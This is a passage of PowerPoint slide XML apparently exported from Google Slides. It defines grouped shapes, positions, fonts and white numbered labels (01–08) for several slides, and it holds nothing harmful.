            <p:cNvPr id="1533" name="Google Shape;1533;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1534" name="Google Shape;1534;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5" name="Google Shape;1535;p12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6" name="Google Shape;1536;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1537" name="Google Shape;1537;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1538" name="Google Shape;1538;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9" name="Google Shape;1539;p12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40" name="Google Shape;1540;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1541" name="Google Shape;1541;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1542" name="Google Shape;1542;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3" name="Google Shape;1543;p12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44" name="Google Shape;1544;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1545" name="Google Shape;1545;p12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06</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1546" name="Google Shape;1546;p12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7" name="Google Shape;1547;p122"/>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48" name="Google Shape;1548;p122"/>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49" name="Google Shape;1549;p12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50" name="Google Shape;1550;p122"/>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51" name="Google Shape;1551;p122"/>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552"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1553" name="Google Shape;1553;p12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55" name="Google Shape;1555;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556" name="Google Shape;1556;p123"/>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557" name="Google Shape;1557;p12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58" name="Google Shape;1558;p123"/>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559" name="Google Shape;1559;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560" name="Google Shape;1560;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1561" name="Google Shape;1561;p12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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1562" name="Google Shape;1562;p12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3" name="Google Shape;1563;p123"/>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64" name="Google Shape;1564;p12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5" name="Google Shape;1565;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1566" name="Google Shape;1566;p12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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1567" name="Google Shape;1567;p12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68" name="Google Shape;1568;p12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69" name="Google Shape;1569;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1570" name="Google Shape;1570;p12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03</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1571" name="Google Shape;1571;p12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2" name="Google Shape;1572;p12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3" name="Google Shape;1573;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1574" name="Google Shape;1574;p12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04</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1575" name="Google Shape;1575;p12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6" name="Google Shape;1576;p12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7" name="Google Shape;1577;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1578" name="Google Shape;1578;p12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05</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1579" name="Google Shape;1579;p12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0" name="Google Shape;1580;p12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1" name="Google Shape;1581;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1582" name="Google Shape;1582;p12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0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1583" name="Google Shape;1583;p12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4" name="Google Shape;1584;p123"/>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85" name="Google Shape;1585;p123"/>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86" name="Google Shape;1586;p12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87" name="Google Shape;1587;p123"/>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88" name="Google Shape;1588;p123"/>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589"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1590" name="Google Shape;1590;p124"/>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592" name="Google Shape;1592;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593" name="Google Shape;1593;p124"/>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594" name="Google Shape;1594;p12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595" name="Google Shape;1595;p124"/>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596" name="Google Shape;1596;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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1597" name="Google Shape;1597;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="3066140"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1598" name="Google Shape;1598;p12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01</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1599" name="Google Shape;1599;p12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0" name="Google Shape;1600;p124"/>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01" name="Google Shape;1601;p124"/>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2" name="Google Shape;1602;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="4459807"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1603" name="Google Shape;1603;p12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02</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1604" name="Google Shape;1604;p12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5" name="Google Shape;1605;p124"/>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06" name="Google Shape;1606;p124"/>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7" name="Google Shape;1607;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="5854874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1608" name="Google Shape;1608;p12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03</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1609" name="Google Shape;1609;p12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0" name="Google Shape;1610;p124"/>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11" name="Google Shape;1611;p124"/>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2" name="Google Shape;1612;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="7248540"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1613" name="Google Shape;1613;p12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04</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1614" name="Google Shape;1614;p12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15" name="Google Shape;1615;p124"/>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16" name="Google Shape;1616;p124"/>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17" name="Google Shape;1617;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="8642207"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1618" name="Google Shape;1618;p12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05</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1619" name="Google Shape;1619;p12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0" name="Google Shape;1620;p124"/>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21" name="Google Shape;1621;p124"/>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2" name="Google Shape;1622;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="10035874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1623" name="Google Shape;1623;p12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06</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1624" name="Google Shape;1624;p12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5" name="Google Shape;1625;p124"/>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26" name="Google Shape;1626;p124"/>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7" name="Google Shape;1627;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="11497607"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1628" name="Google Shape;1628;p12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6900"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1629" name="Google Shape;1629;p12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30" name="Google Shape;1630;p124"/>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631"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1632" name="Google Shape;1632;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33" name="Google Shape;1633;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634" name="Google Shape;1634;p125"/>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635" name="Google Shape;1635;p12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636" name="Google Shape;1636;p125"/>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637" name="Google Shape;1637;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38" name="Google Shape;1638;p12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9" name="Google Shape;1639;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1640" name="Google Shape;1640;p1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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1641" name="Google Shape;1641;p1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2" name="Google Shape;1642;p125"/>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43" name="Google Shape;1643;p12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4" name="Google Shape;1644;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1645" name="Google Shape;1645;p1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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1646" name="Google Shape;1646;p1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7" name="Google Shape;1647;p12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48" name="Google Shape;1648;p12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9" name="Google Shape;1649;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1650" name="Google Shape;1650;p1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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1651" name="Google Shape;1651;p1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2" name="Google Shape;1652;p12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53" name="Google Shape;1653;p12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4" name="Google Shape;1654;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1655" name="Google Shape;1655;p1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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1656" name="Google Shape;1656;p1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57" name="Google Shape;1657;p12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58" name="Google Shape;1658;p12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59" name="Google Shape;1659;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1660" name="Google Shape;1660;p1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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1661" name="Google Shape;1661;p1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2" name="Google Shape;1662;p125"/>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63" name="Google Shape;1663;p12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4" name="Google Shape;1664;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1665" name="Google Shape;1665;p1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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1666" name="Google Shape;1666;p1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7" name="Google Shape;1667;p125"/>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68" name="Google Shape;1668;p12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9" name="Google Shape;1669;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1670" name="Google Shape;1670;p1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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1671" name="Google Shape;1671;p1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2" name="Google Shape;1672;p125"/>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73" name="Google Shape;1673;p12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74" name="Google Shape;1674;p125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1675" name="Google Shape;1675;p1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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1676" name="Google Shape;1676;p1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77" name="Google Shape;1677;p125"/>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678"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1679" name="Google Shape;1679;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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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80" name="Google Shape;1680;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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="48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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1681" name="Google Shape;1681;p126"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731476" y="1706880"/>
            <a:ext cx="22915500" cy="27300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1682" name="Google Shape;1682;p12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683" name="Google Shape;1683;p126"/>
          <p:cNvCxnSpPr/>
